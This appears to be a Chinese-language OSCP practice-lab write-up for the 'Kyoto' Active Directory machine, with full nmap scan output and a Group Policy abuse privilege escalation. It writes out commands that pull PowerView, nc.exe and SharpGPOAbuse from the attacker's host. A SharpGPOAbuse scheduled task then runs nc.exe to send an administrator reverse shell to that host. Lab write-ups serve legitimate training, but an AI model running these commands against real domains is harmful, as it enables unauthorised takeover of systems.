OSCP靶场–Kyoto
考点(缓冲区溢出+GPO滥用提权)
1.nmap扫描
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.216.31 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-31 08:08 EDT
Nmap scan report for 192.168.216.31
Host is up (0.37s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-31 12:09:19Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Kyotosoft.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Kyotosoft.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=kyoto.Kyotosoft.com
| Not valid before: 2024-03-30T12:07:35
|_Not valid after: 2024-09-29T12:07:35
| rdp-ntlm-info:
| Target_Name: KYOTOSOFT
| NetBIOS_Domain_Name: KYOTOSOFT
| NetBIOS_Computer_Name: KYOTO
| DNS_Domain_Name: Kyotosoft.com
| DNS_Computer_Name: kyoto.Kyotosoft.com
| DNS_Tree_Name: Kyotosoft.com
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-31T12:10:21+00:00
|_ssl-date: 2024-03-31T12:10:59+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
52256/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
52257/tcp open msrpc Microsoft Windows RPC
52272/tcp open msrpc Microsoft Windows RPC
52279/tcp open msrpc Microsoft Windows RPC
52284/tcp open msrpc Microsoft Windows RPC
52301/tcp open msrpc Microsoft Windows RPC
Service Info: Host: KYOTO; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-03-31T12:10:21
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 373.50 seconds
##########################
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sU -T4 -F 192.168.216.31
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-31 08:26 EDT
Nmap scan report for 192.168.216.31
Host is up (0.41s latency).
Not shown: 96 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
111/udp open rpcbind
123/udp open ntp
2049/udp open nfs
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
2.user priv
## 缓冲区溢出:省略
https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd
3. root priv
## GPO滥用提权:
##
https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd
##################################################################
## 工具:
https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x64/SharpGPOAbuse.exe
## 场景:
## 当前用户是组策略组和GPO管理组,所以可以滥用 GPO 策略提权:
## 方法1.可以将当前用户添加到管理员组,然后使用当前用户的账户密码登陆,需要有密码
## 方法2.没有当前用户的密码,可以创建一个用户,然后添加到管理员组,使用新用户的账户密码登陆
## 方法3.没有当前用户的密码,直接组策略设置定时任务,以管理员权限反弹shell
#####################################################################
## 方法3实操:
################
## 枚举组策略:找到Default Domain Policy
## . .\导入ps脚本可以使powershell执行中保留命令执行的上下文环境
#At kali machine, powerview.ps1 should at /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
python3 -m http.server 80
#At target machine, download powerview.ps1,
cd c:\temp
curl http://$kaliIP/powerview.ps1 -o powerview.ps1
#switch to powershell
powershell
. .\powerview.ps1
Get-NetGPO
########################################################################
## 上传nc和SharpGPOAbuse.exe,设置反弹shell的管理员权限的定时任务
#Transfer nc.exe to the target machine, nc.exe can be found at /usr/share/windows-resources/binaries/nc.exe
#At kali machine
python3 -m http.server 80
#At target machine, download binaries
cd c:\temp
curl http://$kaliIP/nc.exe -o nc.exe
curl http://$kaliIP/SharpGPOAbuse.exe -o sharp.exe
#Execute Sharp.GPOAbuse.exe, below command execute in powershell
./sharp.exe --AddComputerTask --TaskName "test" --Author "Administrator" --Command "cmd.exe" --Arguments "/c c:\temp\nc.exe $KaliIP 80 -e cmd.exe" --GPOName "Default Domain Policy"
#At kali machine
nc -nlvp 80
#At target machine, update the GPO changes
gpupdate /force
########################################################################
## kaii接受反弹shell:
4.总结:
